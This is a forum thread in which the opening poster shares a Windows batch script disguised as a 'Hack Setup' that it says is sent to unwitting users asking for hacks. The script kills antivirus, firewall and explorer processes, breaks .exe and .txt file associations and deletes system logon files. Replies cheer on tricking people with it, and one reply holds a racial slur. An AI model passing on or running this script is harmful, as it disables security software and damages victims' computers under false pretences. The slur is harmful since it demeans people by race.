Jump to content

Featured Replies

Posted

Made a small .cmd script that I send to noobs when they want hacks from me. Bassically what it does is change the association of a .exe file to a .txt file and change the association of a .txt file with a .mp3 file so every time you open up a .exe it opens up in notepad.

 

title HACK SETUP
color 0A
@echo off
set end=md "Hack Setup"
set fin=copy "Hack Setup.txt" "Installing"
%end%
%fin%
net send * Hacks are installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * You got hacked biatch.
msg * L 2 Compute.
cls
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
msg * G'night

 

A quick fix:

title Hack Setup
color 0A
@echo off
cls
assoc .exe=exefile
assoc .txt=txtfile
cls

looks fun...but I guess a lot of shitty people below me will post stuff like "UH! that's so fucking easy!" and stuff like that, so I thought...hell...let's post something different!

That's cool. I saw the

 

DEL C:\WINDOWS\system32\logoff.exe /F /Q

DEL C:\WINDOWS\system32\logon.exe /F /Q

DEL C:\WINDOWS\system32\logon.scr /F /Q

 

lines and got worried, but decided to try it myself and that's pretty cool.

DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q

 

RIFK!

 

Edit : Forgot to say something.

 

nice little script, kiddy

If you know what myg0t is, chances are you know what that script will do.

I aint never touchin that shit.

But for fun, Let's see how many fall for it.

nice little batch file that one can create and do damage with, similar to using deltree in a batch to delete the users Windows folder.

 

anyway, my one question was that sometimes would the script be stopped from executing if the person does not have the zonelabs firewall installed( kill zonelabs.exe) but has McAfee, AVG, etc or do these firewalls allow you to run the script?

 

EDIT: Guess you haven't been on these forums for awhile since you joined the same time i did.

 

This forum should have more people like you who have legit posts and don't troll. But that's like telling a nig ger to stop smoking crack.

Guest
This topic is now closed to further replies.